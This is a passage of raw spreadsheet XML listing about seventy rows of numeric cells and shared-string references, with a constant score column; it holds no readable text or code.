      <c r="C21977" s="2" t="s">
        <v>21220</v>
      </c>
      <c r="D21977" s="2">
        <v>1.0</v>
      </c>
      <c r="E21977" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21977" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="21978" ht="15.75" customHeight="1">
      <c r="A21978" s="1">
        <v>1636.0</v>
      </c>
      <c r="B21978" s="2">
        <v>2.8004205E7</v>
      </c>
      <c r="C21978" s="2" t="s">
        <v>21221</v>
      </c>
      <c r="D21978" s="2">
        <v>1.0</v>
      </c>
      <c r="E21978" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21978" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="21979" ht="15.75" customHeight="1">
      <c r="A21979" s="1">
        <v>1940.0</v>
      </c>
      <c r="B21979" s="2">
        <v>3.0204734E7</v>
      </c>
      <c r="C21979" s="2" t="s">
        <v>21222</v>
      </c>
      <c r="D21979" s="2">
        <v>1.0</v>
      </c>
      <c r="E21979" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21979" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="21980" ht="15.75" customHeight="1">
      <c r="A21980" s="1">
        <v>1989.0</v>
      </c>
      <c r="B21980" s="2">
        <v>3.0507243E7</v>
      </c>
      <c r="C21980" s="2" t="s">
        <v>21223</v>
      </c>
      <c r="D21980" s="2">
        <v>1.0</v>
      </c>
      <c r="E21980" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21980" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="21981" ht="15.75" customHeight="1">
      <c r="A21981" s="1">
        <v>2005.0</v>
      </c>
      <c r="B21981" s="2">
        <v>3.0636217E7</v>
      </c>
      <c r="C21981" s="2" t="s">
        <v>21224</v>
      </c>
      <c r="D21981" s="2">
        <v>1.0</v>
      </c>
      <c r="E21981" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21981" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="21982" ht="15.75" customHeight="1">
      <c r="A21982" s="1">
        <v>2579.0</v>
      </c>
      <c r="B21982" s="2">
        <v>3.4298032E7</v>
      </c>
      <c r="C21982" s="2" t="s">
        <v>21225</v>
      </c>
      <c r="D21982" s="2">
        <v>1.0</v>
      </c>
      <c r="E21982" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21982" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="21983" ht="15.75" customHeight="1">
      <c r="A21983" s="1">
        <v>2705.0</v>
      </c>
      <c r="B21983" s="2">
        <v>3.4863333E7</v>
      </c>
      <c r="C21983" s="2" t="s">
        <v>21226</v>
      </c>
      <c r="D21983" s="2">
        <v>1.0</v>
      </c>
      <c r="E21983" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21983" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="21984" ht="15.75" customHeight="1">
      <c r="A21984" s="1">
        <v>2976.0</v>
      </c>
      <c r="B21984" s="2">
        <v>3.6108811E7</v>
      </c>
      <c r="C21984" s="2" t="s">
        <v>21227</v>
      </c>
      <c r="D21984" s="2">
        <v>1.0</v>
      </c>
      <c r="E21984" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21984" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="21985" ht="15.75" customHeight="1">
      <c r="A21985" s="1">
        <v>3034.0</v>
      </c>
      <c r="B21985" s="2">
        <v>3.6473387E7</v>
      </c>
      <c r="C21985" s="2" t="s">
        <v>21228</v>
      </c>
      <c r="D21985" s="2">
        <v>1.0</v>
      </c>
      <c r="E21985" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21985" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="21986" ht="15.75" customHeight="1">
      <c r="A21986" s="1">
        <v>3113.0</v>
      </c>
      <c r="B21986" s="2">
        <v>3.6768381E7</v>
      </c>
      <c r="C21986" s="2" t="s">
        <v>21229</v>
      </c>
      <c r="D21986" s="2">
        <v>1.0</v>
      </c>
      <c r="E21986" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21986" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="21987" ht="15.75" customHeight="1">
      <c r="A21987" s="1">
        <v>3130.0</v>
      </c>
      <c r="B21987" s="2">
        <v>3.6856247E7</v>
      </c>
      <c r="C21987" s="2" t="s">
        <v>21230</v>
      </c>
      <c r="D21987" s="2">
        <v>1.0</v>
      </c>
      <c r="E21987" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21987" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="21988" ht="15.75" customHeight="1">
      <c r="A21988" s="1">
        <v>3377.0</v>
      </c>
      <c r="B21988" s="2">
        <v>3.7921996E7</v>
      </c>
      <c r="C21988" s="2" t="s">
        <v>21231</v>
      </c>
      <c r="D21988" s="2">
        <v>1.0</v>
      </c>
      <c r="E21988" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21988" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="21989" ht="15.75" customHeight="1">
      <c r="A21989" s="1">
        <v>3423.0</v>
      </c>
      <c r="B21989" s="2">
        <v>3.8163037E7</v>
      </c>
      <c r="C21989" s="2" t="s">
        <v>21232</v>
      </c>
      <c r="D21989" s="2">
        <v>1.0</v>
      </c>
      <c r="E21989" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21989" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="21990" ht="15.75" customHeight="1">
      <c r="A21990" s="1">
        <v>3510.0</v>
      </c>
      <c r="B21990" s="2">
        <v>3.8555687E7</v>
      </c>
      <c r="C21990" s="2" t="s">
        <v>21233</v>
      </c>
      <c r="D21990" s="2">
        <v>1.0</v>
      </c>
      <c r="E21990" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21990" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="21991" ht="15.75" customHeight="1">
      <c r="A21991" s="1">
        <v>3603.0</v>
      </c>
      <c r="B21991" s="2">
        <v>3.9092138E7</v>
      </c>
      <c r="C21991" s="2" t="s">
        <v>21234</v>
      </c>
      <c r="D21991" s="2">
        <v>1.0</v>
      </c>
      <c r="E21991" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21991" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="21992" ht="15.75" customHeight="1">
      <c r="A21992" s="1">
        <v>3623.0</v>
      </c>
      <c r="B21992" s="2">
        <v>3.9192703E7</v>
      </c>
      <c r="C21992" s="2" t="s">
        <v>21235</v>
      </c>
      <c r="D21992" s="2">
        <v>1.0</v>
      </c>
      <c r="E21992" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21992" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="21993" ht="15.75" customHeight="1">
      <c r="A21993" s="1">
        <v>3637.0</v>
      </c>
      <c r="B21993" s="2">
        <v>3.9278937E7</v>
      </c>
      <c r="C21993" s="2" t="s">
        <v>21236</v>
      </c>
      <c r="D21993" s="2">
        <v>1.0</v>
      </c>
      <c r="E21993" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21993" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="21994" ht="15.75" customHeight="1">
      <c r="A21994" s="1">
        <v>3721.0</v>
      </c>
      <c r="B21994" s="2">
        <v>3.9613235E7</v>
      </c>
      <c r="C21994" s="2" t="s">
        <v>21237</v>
      </c>
      <c r="D21994" s="2">
        <v>1.0</v>
      </c>
      <c r="E21994" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21994" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="21995" ht="15.75" customHeight="1">
      <c r="A21995" s="1">
        <v>3750.0</v>
      </c>
      <c r="B21995" s="2">
        <v>3.9710973E7</v>
      </c>
      <c r="C21995" s="2" t="s">
        <v>21238</v>
      </c>
      <c r="D21995" s="2">
        <v>1.0</v>
      </c>
      <c r="E21995" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21995" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="21996" ht="15.75" customHeight="1">
      <c r="A21996" s="1">
        <v>3818.0</v>
      </c>
      <c r="B21996" s="2">
        <v>4.0104559E7</v>
      </c>
      <c r="C21996" s="2" t="s">
        <v>21239</v>
      </c>
      <c r="D21996" s="2">
        <v>1.0</v>
      </c>
      <c r="E21996" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21996" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="21997" ht="15.75" customHeight="1">
      <c r="A21997" s="1">
        <v>4119.0</v>
      </c>
      <c r="B21997" s="2">
        <v>4.1354792E7</v>
      </c>
      <c r="C21997" s="2" t="s">
        <v>21240</v>
      </c>
      <c r="D21997" s="2">
        <v>1.0</v>
      </c>
      <c r="E21997" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21997" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="21998" ht="15.75" customHeight="1">
      <c r="A21998" s="1">
        <v>4375.0</v>
      </c>
      <c r="B21998" s="2">
        <v>4.2145566E7</v>
      </c>
      <c r="C21998" s="2" t="s">
        <v>21241</v>
      </c>
      <c r="D21998" s="2">
        <v>1.0</v>
      </c>
      <c r="E21998" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21998" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="21999" ht="15.75" customHeight="1">
      <c r="A21999" s="1">
        <v>4394.0</v>
      </c>
      <c r="B21999" s="2">
        <v>4.2241055E7</v>
      </c>
      <c r="C21999" s="2" t="s">
        <v>21242</v>
      </c>
      <c r="D21999" s="2">
        <v>1.0</v>
      </c>
      <c r="E21999" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21999" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22000" ht="15.75" customHeight="1">
      <c r="A22000" s="1">
        <v>4540.0</v>
      </c>
      <c r="B22000" s="2">
        <v>4.2659056E7</v>
      </c>
      <c r="C22000" s="2" t="s">
        <v>21243</v>
      </c>
      <c r="D22000" s="2">
        <v>1.0</v>
      </c>
      <c r="E22000" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22000" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22001" ht="15.75" customHeight="1">
      <c r="A22001" s="1">
        <v>4556.0</v>
      </c>
      <c r="B22001" s="2">
        <v>4.2704424E7</v>
      </c>
      <c r="C22001" s="2" t="s">
        <v>21244</v>
      </c>
      <c r="D22001" s="2">
        <v>1.0</v>
      </c>
      <c r="E22001" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22001" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22002" ht="15.75" customHeight="1">
      <c r="A22002" s="1">
        <v>4624.0</v>
      </c>
      <c r="B22002" s="2">
        <v>4.297643E7</v>
      </c>
      <c r="C22002" s="2" t="s">
        <v>21245</v>
      </c>
      <c r="D22002" s="2">
        <v>1.0</v>
      </c>
      <c r="E22002" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22002" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22003" ht="15.75" customHeight="1">
      <c r="A22003" s="1">
        <v>4643.0</v>
      </c>
      <c r="B22003" s="2">
        <v>4.3027491E7</v>
      </c>
      <c r="C22003" s="2" t="s">
        <v>21246</v>
      </c>
      <c r="D22003" s="2">
        <v>1.0</v>
      </c>
      <c r="E22003" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22003" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22004" ht="15.75" customHeight="1">
      <c r="A22004" s="1">
        <v>4810.0</v>
      </c>
      <c r="B22004" s="2">
        <v>4.3554006E7</v>
      </c>
      <c r="C22004" s="2" t="s">
        <v>21247</v>
      </c>
      <c r="D22004" s="2">
        <v>1.0</v>
      </c>
      <c r="E22004" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22004" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22005" ht="15.75" customHeight="1">
      <c r="A22005" s="1">
        <v>5517.0</v>
      </c>
      <c r="B22005" s="2">
        <v>4.5855214E7</v>
      </c>
      <c r="C22005" s="2" t="s">
        <v>21248</v>
      </c>
      <c r="D22005" s="2">
        <v>1.0</v>
      </c>
      <c r="E22005" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22005" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22006" ht="15.75" customHeight="1">
      <c r="A22006" s="1">
        <v>5560.0</v>
      </c>
      <c r="B22006" s="2">
        <v>4.598408E7</v>
      </c>
      <c r="C22006" s="2" t="s">
        <v>21249</v>
      </c>
      <c r="D22006" s="2">
        <v>1.0</v>
      </c>
      <c r="E22006" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22006" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22007" ht="15.75" customHeight="1">
      <c r="A22007" s="1">
        <v>5791.0</v>
      </c>
      <c r="B22007" s="2">
        <v>4.6776553E7</v>
      </c>
      <c r="C22007" s="2" t="s">
        <v>21250</v>
      </c>
      <c r="D22007" s="2">
        <v>1.0</v>
      </c>
      <c r="E22007" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22007" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22008" ht="15.75" customHeight="1">
      <c r="A22008" s="1">
        <v>5899.0</v>
      </c>
      <c r="B22008" s="2">
        <v>4.7165908E7</v>
      </c>
      <c r="C22008" s="2" t="s">
        <v>21251</v>
      </c>
      <c r="D22008" s="2">
        <v>1.0</v>
      </c>
      <c r="E22008" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22008" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22009" ht="15.75" customHeight="1">
      <c r="A22009" s="1">
        <v>5922.0</v>
      </c>
      <c r="B22009" s="2">
        <v>4.722662E7</v>
      </c>
      <c r="C22009" s="2" t="s">
        <v>21252</v>
      </c>
      <c r="D22009" s="2">
        <v>1.0</v>
      </c>
      <c r="E22009" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22009" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22010" ht="15.75" customHeight="1">
      <c r="A22010" s="1">
        <v>5983.0</v>
      </c>
      <c r="B22010" s="2">
        <v>4.7407492E7</v>
      </c>
      <c r="C22010" s="2" t="s">
        <v>21253</v>
      </c>
      <c r="D22010" s="2">
        <v>1.0</v>
      </c>
      <c r="E22010" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22010" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22011" ht="15.75" customHeight="1">
      <c r="A22011" s="1">
        <v>5989.0</v>
      </c>
      <c r="B22011" s="2">
        <v>4.7410403E7</v>
      </c>
      <c r="C22011" s="2" t="s">
        <v>21254</v>
      </c>
      <c r="D22011" s="2">
        <v>1.0</v>
      </c>
      <c r="E22011" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22011" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22012" ht="15.75" customHeight="1">
      <c r="A22012" s="1">
        <v>6319.0</v>
      </c>
      <c r="B22012" s="2">
        <v>4.8255383E7</v>
      </c>
      <c r="C22012" s="2" t="s">
        <v>21255</v>
      </c>
      <c r="D22012" s="2">
        <v>1.0</v>
      </c>
      <c r="E22012" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22012" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22013" ht="15.75" customHeight="1">
      <c r="A22013" s="1">
        <v>6349.0</v>
      </c>
      <c r="B22013" s="2">
        <v>4.8318012E7</v>
      </c>
      <c r="C22013" s="2" t="s">
        <v>21256</v>
      </c>
      <c r="D22013" s="2">
        <v>1.0</v>
      </c>
      <c r="E22013" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22013" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22014" ht="15.75" customHeight="1">
      <c r="A22014" s="1">
        <v>6425.0</v>
      </c>
      <c r="B22014" s="2">
        <v>4.8557666E7</v>
      </c>
      <c r="C22014" s="2" t="s">
        <v>21257</v>
      </c>
      <c r="D22014" s="2">
        <v>1.0</v>
      </c>
      <c r="E22014" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22014" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22015" ht="15.75" customHeight="1">
      <c r="A22015" s="1">
        <v>6554.0</v>
      </c>
      <c r="B22015" s="2">
        <v>4.8878972E7</v>
      </c>
      <c r="C22015" s="2" t="s">
        <v>21258</v>
      </c>
      <c r="D22015" s="2">
        <v>1.0</v>
      </c>
      <c r="E22015" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22015" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22016" ht="15.75" customHeight="1">
      <c r="A22016" s="1">
        <v>6556.0</v>
      </c>
      <c r="B22016" s="2">
        <v>4.8878972E7</v>
      </c>
      <c r="C22016" s="2" t="s">
        <v>21259</v>
      </c>
      <c r="D22016" s="2">
        <v>1.0</v>
      </c>
      <c r="E22016" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22016" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22017" ht="15.75" customHeight="1">
      <c r="A22017" s="1">
        <v>6761.0</v>
      </c>
      <c r="B22017" s="2">
        <v>4.9409392E7</v>
      </c>
      <c r="C22017" s="2" t="s">
        <v>21260</v>
      </c>
      <c r="D22017" s="2">
        <v>1.0</v>
      </c>
      <c r="E22017" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22017" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22018" ht="15.75" customHeight="1">
      <c r="A22018" s="1">
        <v>6988.0</v>
      </c>
      <c r="B22018" s="2">
        <v>5.0051026E7</v>
      </c>
      <c r="C22018" s="2" t="s">
        <v>21261</v>
      </c>
      <c r="D22018" s="2">
        <v>1.0</v>
      </c>
      <c r="E22018" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22018" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22019" ht="15.75" customHeight="1">
      <c r="A22019" s="1">
        <v>7135.0</v>
      </c>
      <c r="B22019" s="2">
        <v>5.0440443E7</v>
      </c>
      <c r="C22019" s="2" t="s">
        <v>21262</v>
      </c>
      <c r="D22019" s="2">
        <v>1.0</v>
      </c>
      <c r="E22019" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22019" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22020" ht="15.75" customHeight="1">
      <c r="A22020" s="1">
        <v>7281.0</v>
      </c>
      <c r="B22020" s="2">
        <v>5.0788896E7</v>
      </c>
      <c r="C22020" s="2" t="s">
        <v>21263</v>
      </c>
      <c r="D22020" s="2">
        <v>1.0</v>
      </c>
      <c r="E22020" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22020" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22021" ht="15.75" customHeight="1">
      <c r="A22021" s="1">
        <v>7436.0</v>
      </c>
      <c r="B22021" s="2">
        <v>5.1207871E7</v>
      </c>
      <c r="C22021" s="2" t="s">
        <v>21264</v>
      </c>
      <c r="D22021" s="2">
        <v>1.0</v>
      </c>
      <c r="E22021" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22021" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22022" ht="15.75" customHeight="1">
      <c r="A22022" s="1">
        <v>7542.0</v>
      </c>
      <c r="B22022" s="2">
        <v>5.147326E7</v>
      </c>
      <c r="C22022" s="2" t="s">
        <v>21265</v>
      </c>
      <c r="D22022" s="2">
        <v>1.0</v>
      </c>
      <c r="E22022" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22022" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22023" ht="15.75" customHeight="1">
      <c r="A22023" s="1">
        <v>7758.0</v>
      </c>
      <c r="B22023" s="2">
        <v>5.210177E7</v>
      </c>
      <c r="C22023" s="2" t="s">
        <v>21266</v>
      </c>
      <c r="D22023" s="2">
        <v>1.0</v>
      </c>
      <c r="E22023" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22023" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22024" ht="15.75" customHeight="1">
      <c r="A22024" s="1">
        <v>8022.0</v>
      </c>
      <c r="B22024" s="2">
        <v>5.2804441E7</v>
      </c>
      <c r="C22024" s="2" t="s">
        <v>21267</v>
      </c>
      <c r="D22024" s="2">
        <v>1.0</v>
      </c>
      <c r="E22024" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22024" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22025" ht="15.75" customHeight="1">
      <c r="A22025" s="1">
        <v>8193.0</v>
      </c>
      <c r="B22025" s="2">
        <v>5.3252741E7</v>
      </c>
      <c r="C22025" s="2" t="s">
        <v>21268</v>
      </c>
      <c r="D22025" s="2">
        <v>1.0</v>
      </c>
      <c r="E22025" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22025" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22026" ht="15.75" customHeight="1">
      <c r="A22026" s="1">
        <v>8199.0</v>
      </c>
      <c r="B22026" s="2">
        <v>5.3277534E7</v>
      </c>
      <c r="C22026" s="2" t="s">
        <v>21269</v>
      </c>
      <c r="D22026" s="2">
        <v>1.0</v>
      </c>
      <c r="E22026" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22026" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22027" ht="15.75" customHeight="1">
      <c r="A22027" s="1">
        <v>8247.0</v>
      </c>
      <c r="B22027" s="2">
        <v>5.3372832E7</v>
      </c>
      <c r="C22027" s="2" t="s">
        <v>21270</v>
      </c>
      <c r="D22027" s="2">
        <v>1.0</v>
      </c>
      <c r="E22027" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22027" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22028" ht="15.75" customHeight="1">
      <c r="A22028" s="1">
        <v>8412.0</v>
      </c>
      <c r="B22028" s="2">
        <v>5.390067E7</v>
      </c>
      <c r="C22028" s="2" t="s">
        <v>21271</v>
      </c>
      <c r="D22028" s="2">
        <v>1.0</v>
      </c>
      <c r="E22028" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22028" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22029" ht="15.75" customHeight="1">
      <c r="A22029" s="1">
        <v>8527.0</v>
      </c>
      <c r="B22029" s="2">
        <v>5.4096901E7</v>
      </c>
      <c r="C22029" s="2" t="s">
        <v>21272</v>
      </c>
      <c r="D22029" s="2">
        <v>1.0</v>
      </c>
      <c r="E22029" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22029" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22030" ht="15.75" customHeight="1">
      <c r="A22030" s="1">
        <v>8626.0</v>
      </c>
      <c r="B22030" s="2">
        <v>5.4307406E7</v>
      </c>
      <c r="C22030" s="2" t="s">
        <v>21273</v>
      </c>
      <c r="D22030" s="2">
        <v>1.0</v>
      </c>
      <c r="E22030" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22030" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22031" ht="15.75" customHeight="1">
      <c r="A22031" s="1">
        <v>8687.0</v>
      </c>
      <c r="B22031" s="2">
        <v>5.4408118E7</v>
      </c>
      <c r="C22031" s="2" t="s">
        <v>21274</v>
      </c>
      <c r="D22031" s="2">
        <v>1.0</v>
      </c>
      <c r="E22031" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22031" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22032" ht="15.75" customHeight="1">
      <c r="A22032" s="1">
        <v>9117.0</v>
      </c>
      <c r="B22032" s="2">
        <v>5.5209809E7</v>
      </c>
      <c r="C22032" s="2" t="s">
        <v>21275</v>
      </c>
      <c r="D22032" s="2">
        <v>1.0</v>
      </c>
      <c r="E22032" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22032" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22033" ht="15.75" customHeight="1">
      <c r="A22033" s="1">
        <v>9121.0</v>
      </c>
      <c r="B22033" s="2">
        <v>5.5216762E7</v>
      </c>
      <c r="C22033" s="2" t="s">
        <v>21276</v>
      </c>
      <c r="D22033" s="2">
        <v>1.0</v>
      </c>
      <c r="E22033" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22033" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22034" ht="15.75" customHeight="1">
      <c r="A22034" s="1">
        <v>9260.0</v>
      </c>
      <c r="B22034" s="2">
        <v>5.5491338E7</v>
      </c>
      <c r="C22034" s="2" t="s">
        <v>21277</v>
      </c>
      <c r="D22034" s="2">
        <v>1.0</v>
      </c>
      <c r="E22034" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22034" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22035" ht="15.75" customHeight="1">
      <c r="A22035" s="1">
        <v>9271.0</v>
      </c>
      <c r="B22035" s="2">
        <v>5.5499871E7</v>
      </c>
      <c r="C22035" s="2" t="s">
        <v>21278</v>
      </c>
      <c r="D22035" s="2">
        <v>1.0</v>
      </c>
      <c r="E22035" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22035" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22036" ht="15.75" customHeight="1">
      <c r="A22036" s="1">
        <v>9458.0</v>
      </c>
      <c r="B22036" s="2">
        <v>5.5847788E7</v>
      </c>
      <c r="C22036" s="2" t="s">
        <v>21279</v>
      </c>
      <c r="D22036" s="2">
        <v>1.0</v>
      </c>
      <c r="E22036" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22036" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22037" ht="15.75" customHeight="1">
      <c r="A22037" s="1">
        <v>9459.0</v>
      </c>
      <c r="B22037" s="2">
        <v>5.5847788E7</v>
      </c>
      <c r="C22037" s="2" t="s">
        <v>21280</v>
      </c>
      <c r="D22037" s="2">
        <v>1.0</v>
      </c>
      <c r="E22037" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22037" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22038" ht="15.75" customHeight="1">
      <c r="A22038" s="1">
        <v>9546.0</v>
      </c>
      <c r="B22038" s="2">
        <v>5.6025535E7</v>
      </c>
      <c r="C22038" s="2" t="s">
        <v>21281</v>
      </c>
      <c r="D22038" s="2">
        <v>1.0</v>
      </c>
      <c r="E22038" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22038" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22039" ht="15.75" customHeight="1">
      <c r="A22039" s="1">
        <v>9997.0</v>
      </c>
      <c r="B22039" s="2">
        <v>5.7004964E7</v>
      </c>
      <c r="C22039" s="2" t="s">
        <v>21282</v>
      </c>
      <c r="D22039" s="2">
        <v>1.0</v>
      </c>
      <c r="E22039" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22039" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22040" ht="15.75" customHeight="1">
      <c r="A22040" s="1">
        <v>10039.0</v>
      </c>
      <c r="B22040" s="2">
        <v>5.7066392E7</v>
      </c>
      <c r="C22040" s="2" t="s">
        <v>21283</v>
      </c>
      <c r="D22040" s="2">
        <v>1.0</v>
      </c>
      <c r="E22040" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22040" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22041" ht="15.75" customHeight="1">
      <c r="A22041" s="1">
        <v>10052.0</v>
      </c>
      <c r="B22041" s="2">
        <v>5.7117336E7</v>
      </c>
      <c r="C22041" s="2" t="s">
        <v>21284</v>
      </c>
      <c r="D22041" s="2">
        <v>1.0</v>
      </c>
      <c r="E22041" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22041" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22042" ht="15.75" customHeight="1">
      <c r="A22042" s="1">
        <v>10090.0</v>
      </c>
      <c r="B22042" s="2">
        <v>5.7173862E7</v>
      </c>
      <c r="C22042" s="2" t="s">
        <v>21284</v>
      </c>
      <c r="D22042" s="2">
        <v>1.0</v>
      </c>
      <c r="E22042" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22042" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22043" ht="15.75" customHeight="1">
      <c r="A22043" s="1">
        <v>10094.0</v>
      </c>
      <c r="B22043" s="2">
        <v>5.7187876E7</v>
      </c>
      <c r="C22043" s="2" t="s">
        <v>21285</v>
      </c>
      <c r="D22043" s="2">
        <v>1.0</v>
      </c>
      <c r="E22043" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22043" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22044" ht="15.75" customHeight="1">
      <c r="A22044" s="1">
        <v>10149.0</v>
      </c>
      <c r="B22044" s="2">
        <v>5.7310323E7</v>
